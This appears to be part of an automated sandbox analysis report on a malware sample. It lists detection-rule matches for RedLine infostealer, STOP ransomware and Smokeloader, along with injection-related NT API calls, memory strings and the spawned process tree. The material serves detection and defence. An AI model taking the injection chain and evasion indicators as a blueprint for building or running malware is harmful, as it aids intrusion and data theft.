              Source: 16.3.226F.exe.16f3fc0.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 16.3.226F.exe.16f3fc0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 15.2.2560.exe.4a015a0.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
              Source: 15.2.2560.exe.4a015a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
              Source: 15.2.2560.exe.4a015a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 17.2.2560.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
              Source: 17.2.2560.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
              Source: 17.2.2560.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 0000000D.00000002.402603602.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
              Source: 0000000F.00000002.362651886.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000011.00000002.363362004.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
              Source: 00000011.00000002.363362004.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
              Source: 00000011.00000002.363362004.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 0000000D.00000002.403573170.0000000004921000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: 00000000.00000002.291031913.0000000004931000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: 00000010.00000003.367401202.000000000D030000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 0000000F.00000002.361737434.0000000002EA1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
              Source: 0000000E.00000002.577154071.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
              Source: 0000000D.00000002.402735340.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: 00000000.00000002.290704860.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: 0000000D.00000002.403103692.0000000002C80000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
              Source: 00000000.00000002.290595055.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
              Source: 00000000.00000002.290961017.0000000002C60000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
              Source: 0000000E.00000002.577358269.0000000000678000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
              Source: Process Memory Space: 2560.exe PID: 2136, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: Process Memory Space: 2560.exe PID: 3152, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: String function: 00413FF0 appears 54 times
              Source: C:\Users\user\Desktop\aw9Ynwqd1x.exeCode function: 0_2_00401558 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
              Source: C:\Users\user\Desktop\aw9Ynwqd1x.exeCode function: 0_2_00401749 NtMapViewOfSection,NtMapViewOfSection,
              Source: C:\Users\user\Desktop\aw9Ynwqd1x.exeCode function: 0_2_00401564 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
              Source: C:\Users\user\Desktop\aw9Ynwqd1x.exeCode function: 0_2_00401577 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
              Source: C:\Users\user\Desktop\aw9Ynwqd1x.exeCode function: 0_2_00401523 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
              Source: C:\Users\user\Desktop\aw9Ynwqd1x.exeCode function: 0_2_00401585 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
              Source: C:\Users\user\Desktop\aw9Ynwqd1x.exeCode function: 0_2_0040158C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
              Source: C:\Users\user\Desktop\aw9Ynwqd1x.exeCode function: 0_2_0040159A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
              Source: C:\Users\user\AppData\Roaming\dbjigstCode function: 13_2_00401558 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
              Source: C:\Users\user\AppData\Roaming\dbjigstCode function: 13_2_00401749 NtMapViewOfSection,NtMapViewOfSection,
              Source: C:\Users\user\AppData\Roaming\dbjigstCode function: 13_2_00401564 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
              Source: C:\Users\user\AppData\Roaming\dbjigstCode function: 13_2_00401577 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
              Source: C:\Users\user\AppData\Roaming\dbjigstCode function: 13_2_00401523 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
              Source: C:\Users\user\AppData\Roaming\dbjigstCode function: 13_2_00401585 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
              Source: C:\Users\user\AppData\Roaming\dbjigstCode function: 13_2_0040158C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
              Source: C:\Users\user\AppData\Roaming\dbjigstCode function: 13_2_0040159A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
              Source: Library.exe.25.drStatic PE information: No import functions for PE file found
              Source: 226F.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: aw9Ynwqd1x.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ERC\statecache.lockJump to behavior
              Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@30/14@4/5
              Source: C:\Users\user\AppData\Local\Temp\336E.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: fontview.exe, 00000013.00000003.412196998.0000000006930000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.410010255.00000000055B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/AppExplorer.AssocActionId.BurnSelectionExplorer.AssocActionId.CloseSessionIehistoryIerssJavascriptJscriptLDAPResrloginStickyNotesExplorer.AssocActionId.EraseDiscExplorer.AssocActionId.ZipSelectionExplorer.AssocProtocol.search-msExplorer.BurnSelectionExplorer.CloseSessionExplorer.EraseDiscExplorer.ZipSelectionFile.adp.app.application.appref-ms.asp.bas.cnt.cpftelnettn3270VbscriptwindowsmediacenterappwindowsmediacentersslwindowsmediacenterwebWMP11.AssocProtocol.MMS.ade.hlp.hme.hpj.hta.ins.isp.its.jse.cpl.crd.crds.crt.csh.fxp.gadget.grp.mat.mau.mav.maw.mcf.mda.mde.mdt.ksh.mad.maf.mag.mam.maq.mar.mas.mshxml.mst.ops.pcd.pl.plg.prf.prg.mdw.mdz.msc.msh.msh1.msh1xml.msh2.msh2xml.pvw.plsc.rb.rbw.rdp.rgu.scf.scr.printerexport.provxml.ps2.ps2xml.psc2.py.pyc.pyo.vsw.webpnp.ws.wsc.wsh.xaml.xdp.xip.shb.shs.theme.tsk.vb.vbe.vbp.vsmacros.xnkBRITNLSVDAFIHUNOENDEJAKOTWCNFRHEEUISsr-Latn-CSsr-SP-Latnsr-Cyrl-CSsr-SP-Cyrlsr-Latn-BAELPLRUCSPTSKSLARbs-BA-Latnzh-Hantzh-CHTzh-Hanszh-CHSsr-BA-Latnsr-Cyrl-BAsr-BA-Cyrliu-Latn-CAiu-CA-Latnbs-Cyrl-BAbs-BA-Cyrlbs-Latn-BAdadeelenesfifrhearbgcarmroruhrsksqsvthhuisitjakonlplptfavihyazeuhsbmksttrurukbeetlvlttghimtsegayimskkkytstnvexhzuafkafotateknmlasmrsamnswtkuzttbnpaguorsdsyrsichriuamtzmksbocykmlomyglkokmniibbyoquznsobalbklignefypsfildvbinffhapaparnmohbrugmioccokromtignhawlasoiiar-SAbg-BGca-ESzh-TWcs-CZda-DKde-DEel-GRgswsahqucrwwoprsgdkuja-JPko-KRnl-NLnb-NOpl-PLpt-BRrm-CHro-ROen-USes-ES_tradnlfi-FIfr-FRhe-ILhu-HUis-ISit-ITid-IDuk-UAbe-BYsl-SIet-EElv-LVlt-LTtg-Cyrl-TJru-RUhr-HRsk-SKsq-ALsv-SEth-THtr-TRur-PKts-ZAtn-ZAve-ZAxh-ZAzu-ZAaf-ZAka-GEfo-FOfa-IRvi-VNhy-AMaz-Latn-AZeu-EShsb-DEmk-MKst-ZAtk-TMuz-Latn-UZtt-RUbn-INpa-INgu-INor-INta-INhi-INmt-MTse-NOyi-001ms-MYkk-KZky-KGsw-KEcy-GBkm-KHlo-LAmy-MMgl-ESkok-INmni-INsd-Deva-INte-INkn-INml-INas-INmr-INsa-INmn-MNbo-CNfy-NLps-AFfil-PHdv-MVbin-NGff-NGha-Latn-NGibb-NGsyr-SYsi-LKchr-Cher-USiu-Cans-CAam-ETtzm-Arab-MAks-Arabne-NPom-ETti-ETgn-PYhaw-USla-001so-SOii-CNpap-029yo-NGquz-BOnso-ZAba-RUlb-LUkl-GLig-NGkr-NGsah-RUquc-Latn-GTrw-RWwo-SNprs-AFgd-GBku-Arab-IQqps-plocarn-CLmoh-CAbr-FRug-CNmi-NZoc-FRco-FRgsw-FRit-CHnl-BEnn-NOpt-PTro-MDru-MDsv-FIur-INqps-plocaar-IQca-ES-valenciazh-CNde-CHen-GBes-MXfr-BEpa-Arab-PKta-LKmn-Mong-CNsd-Arab-PKtzm-Latn-DZks-Deva-INne-INff-Latn-SNaz-Cyrl-AZdsb-DEtn-BWse-SEga-IEms-BNuz-Cyrl-UZbn-BDes-ESfr-CAse-FImn-Mong-MNdz-BTquz-PEar-LYzh-SGquz-ECti-ERqps-Latn-x-shqps-plocmar-EGzh-HKde-ATen-AUzh-MOde-LIen-NZes-CRfr-LUsmj-SEar-MAen-IEde-LUen-CAes-GTfr-CHhr-BAsmj-NOtzm-Tfng-MAar-DZar-OMen-JMes-VEfr-REsms-FIar-YEen-029es-COes-PAfr-MCsma-NOar-TNen-ZAes-DOfr-029sma-SEar-JOen-TTes-ARfr-CMsr-Latn-MEar-LBen-ZWes-ECfr-CDsr-Latn-RSsmn-FIar-SYen-BZes-PEfr-SNsr-Cyrl-RSes-UYfr-MAar-BHen-HKes-PYfr-HTar-QAen-INfr-CIsr-Cyrl-MEar-KWen-PHes-CLfr-MLar-AEen-IDes-419es-CUbs-Cyrlbs-Latnsr-Cyrlsr-Latnsmnaz-Cyrles-BOen-MYes-SVen-SGes-HNes-NIes-PRes-USiu-Canstzm-Tfngnbsrtg-Cyrldsbsmjuz-Latnsmszhnnbsaz-Latnsmauz-Cyrlmn-Cyrlquc-Lat
              Source: fontview.exe, 00000013.00000003.416675694.0000000005B80000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.414492613.00000000055B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .xlsmMicrosoft.Office.Desktop_8wekyb3d8bbwe!Excel.dot.dotx.docmMicrosoft.Office.Desktop_8wekyb3d8bbwe!WordMicrosoft.Office.Desktop_8wekyb3d8bbwe!PowerPoint.ods.xla.xlam.xlt.xltm.xltx.xlsb.pps.ppsm.ppsx.thmx.pot.potm.potx.pptmms-powerpointms-excelms-word.odp.ppa.ppamABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/Explorer.AssocActionId.CloseSessionExplorer.AssocActionId.EraseDiscExplorer.AssocActionId.ZipSelectionExplorer.AssocProtocol.search-msExplorer.BurnSelectionExplorer.CloseSessionExplorer.EraseDiscExplorer.ZipSelectionAppExplorer.AssocActionId.BurnSelectionStickyNotestelnettn3270VbscriptwindowsmediacenterappwindowsmediacentersslwindowsmediacenterwebWMP11.AssocProtocol.MMSFileIehistoryIerssJavascriptJscriptLDAPResrlogin.cpf.crd.crds.crt.csh.fxp.gadget.grp.ade.adp.app.application.appref-ms.asp.bas.cnt.ksh.mad.maf.mag.mam.maq.mar.mas.hlp.hme.hpj.hta.ins.isp.its.jse.mdw.mdz.msc.msh.msh1.msh1xml.msh2.msh2xml.mat.mau.mav.maw.mcf.mda.mde.mdt.printerexport.provxml.ps2.ps2xml.psc2.py.pyc.pyo.mshxml.mst.ops.pcd.pl.plg.prf.prg.shb.shs.theme.tsk.vb.vbe.vbp.vsmacros.pvw.plsc.rb.rbw.rdp.rgu.scf.scr.xnk.vsw.webpnp.ws.wsc.wsh.xaml.xdp.xipKOTWCNFRBRITNLSVENDEJAPTTRSKSLARHEEUISDAFIHUNOELPLRUCSiu-Latn-CAiu-CA-Latnbs-Cyrl-BAbs-BA-Cyrlbs-Latn-BAbs-BA-Latnzh-Hantzh-CHTsr-Latn-CSsr-SP-Latnsr-Cyrl-CSsr-SP-Cyrlsr-Latn-BAsr-BA-Latnsr-Cyrl-BAsr-BA-Cyrlzh-Hanszh-CHSarbgcacsdadeitjakonlplptrmroelenesfifrhehuisukbesletlvlttgfaruhrsksqsvthtrurtnvexhzuafkafohivihyazeuhsbmksttstkuzttbnpaguortamtsegayimskkkyswcykmlomyglkokmnisdteknmlasmrsamnbofypsfildvbinffhaibbsyrsichriuamtzmksneomtignhawlasoiipapyoquznsobalbkligkrsahqucrwwoprsgdkuar-SAarnmohbrugmioccogswes-ES_tradnlfi-FIfr-FRhe-ILhu-HUis-ISit-ITja-JPbg-BGca-ESzh-TWcs-CZda-DKde-DEel-GRen-UShr-HRsk-SKsq-ALsv-SEth-THtr-TRur-PKid-IDko-KRnl-NLnb-NOpl-PLpt-BRrm-CHro-ROru-RUvi-VNhy-AMaz-Latn-AZeu-EShsb-DEmk-MKst-ZAts-ZAuk-UAbe-BYsl-SIet-EElv-LVlt-LTtg-Cyrl-TJfa-IRmt-MTse-NOyi-001ms-MYkk-KZky-KGsw-KEtk-TMtn-ZAve-ZAxh-ZAzu-ZAaf-ZAka-GEfo-FOhi-INkn-INml-INas-INmr-INsa-INmn-MNbo-CNcy-GBuz-Latn-UZtt-RUbn-INpa-INgu-INor-INta-INte-INsi-LKchr-Cher-USiu-Cans-CAam-ETtzm-Arab-MAks-Arabne-NPfy-NLkm-KHlo-LAmy-MMgl-ESkok-INmni-INsd-Deva-INsyr-SYquz-BOnso-ZAba-RUlb-LUkl-GLig-NGkr-NGom-ETps-AFfil-PHdv-MVbin-NGff-NGha-Latn-NGibb-NGyo-NGmoh-CAbr-FRug-CNmi-NZoc-FRco-FRgsw-FRsah-RUti-ETgn-PYhaw-USla-001so-SOii-CNpap-029arn-CLar-IQca-ES-valenciazh-CNde-CHen-GBes-MXfr-BEit-CHquc-Latn-GTrw-RWwo-SNprs-AFgd-GBku-Arab-IQqps-plocqps-plocadsb-DEtn-BWse-SEga-IEms-BNuz-Cyrl-UZbn-BDpa-Arab-PKnl-BEnn-NOpt-PTro-MDru-MDsv-FIur-INaz-Cyrl-AZti-ERqps-Latn-x-shqps-plocmar-EGzh-HKde-ATen-AUes-ESta-LKmn-Mong-CNsd-Arab-PKtzm-Latn-DZks-Deva-INne-INff-Latn-SNquz-ECen-CAes-GTfr-CHhr-BAsmj-NOtzm-Tfng-MAar-DZzh-MOfr-CAse-FImn-Mong-MNdz-BTquz-PEar-LYzh-SGde-LUfr-MCsma-NOar-TNen-ZAes-DOfr-029sma-SEar-OMde-LIen-NZes-CRfr-LUsmj-SEar-MAen-IEes-PAsr-Latn-RSsmn-FIar-SYen-BZes-PEfr-SNsr-Cyrl-RSar-JOen-JMes-VEfr-REsms-FIar-YEen-029es-COfr-CDsr-Cyrl-MEar-KWen-PHes-CLf
              Source: fontview.exe, 00000013.00000003.401675563.0000000005000000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: RtlDllShutdownInProgress_p0.*System*.*....../UseSystemForSystemFoldersSoftware\Microsoft\Windows\CurrentVersion\Explorerdesktop.ini%APPDATA%%USERPROFILE%%ALLUSERSPROFILE%%ProgramFiles%%SystemRoot%%SystemDrive%\\%COMPUTERNAME%...\...PATH.exe.lnk.cmd.bat.com.pifCutListSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation\VarFileInfo\Translation\StringFileInfo\%04X%04X\FileDescription\StringFileInfo\040904E4\FileDescription\StringFileInfo\04090000\FileDescriptionProgram ManagerpszDesktopTitleW%%%s%%%sUSERPROFILEProgramFilesSystemRootSystemDrivewindir"%1"commandshellSoftware\classesDefaultIconshell\%sAssignmentType0Software\Classes\Applications\%sSoftware\Classes\Applications%1.ade.adp.app.asp.cer.chm.cnt.crt.csh.der.fxp.gadget.grp.hlp.hpj.inf.ins.isp.its.js.jse.ksh.mad.maf.mag.mam.maq.mar.mas.mat.mau.mav.maw.mcf.mda.mdb.mde.mdt.mdw.mdz.msc.msh.msh1.msh1xml.msh2.msh2xml.mshxml.msp.mst.msu.ops.pcd.pl.plg.prf.prg.printerexport.ps1.ps1xml.ps2.ps2xml.psc1.psc2.psd1.psm1.pst.scf.sct.shb.shs.theme.tmp.url.vbe.vbp.vbs.vhd.vhdx.vsmacros.vsw.webpnp.ws.wsc.wsf.wsh.xnkHKCU:HKLM:HKCR:%s\shell\%s\commandshell\%s\commandSoftware\Clients\%sSoftware\Clients\%s\%sOpen*.*....../UseSystemForSystemFoldersdesktop.ini%SystemDrive%\\%COMPUTERNAME%...\...%s\%s\StringFileInfo\04090000\FileDescriptionT
              Source: aw9Ynwqd1x.exeReversingLabs: Detection: 84%
              Source: aw9Ynwqd1x.exeVirustotal: Detection: 65%
              Source: C:\Users\user\Desktop\aw9Ynwqd1x.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknownProcess created: C:\Users\user\Desktop\aw9Ynwqd1x.exe C:\Users\user\Desktop\aw9Ynwqd1x.exe
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\dbjigst C:\Users\user\AppData\Roaming\dbjigst
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\336E.exe C:\Users\user\AppData\Local\Temp\336E.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\2560.exe C:\Users\user\AppData\Local\Temp\2560.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\226F.exe C:\Users\user\AppData\Local\Temp\226F.exe
              Source: C:\Users\user\AppData\Local\Temp\2560.exeProcess created: C:\Users\user\AppData\Local\Temp\2560.exe C:\Users\user\AppData\Local\Temp\2560.exe
              Source: C:\Users\user\AppData\Local\Temp\226F.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
              Source: C:\Users\user\AppData\Local\Temp\226F.exeProcess created: C:\Windows\SysWOW64\fontview.exe C:\Windows\SYSWOW64\fontview.exe
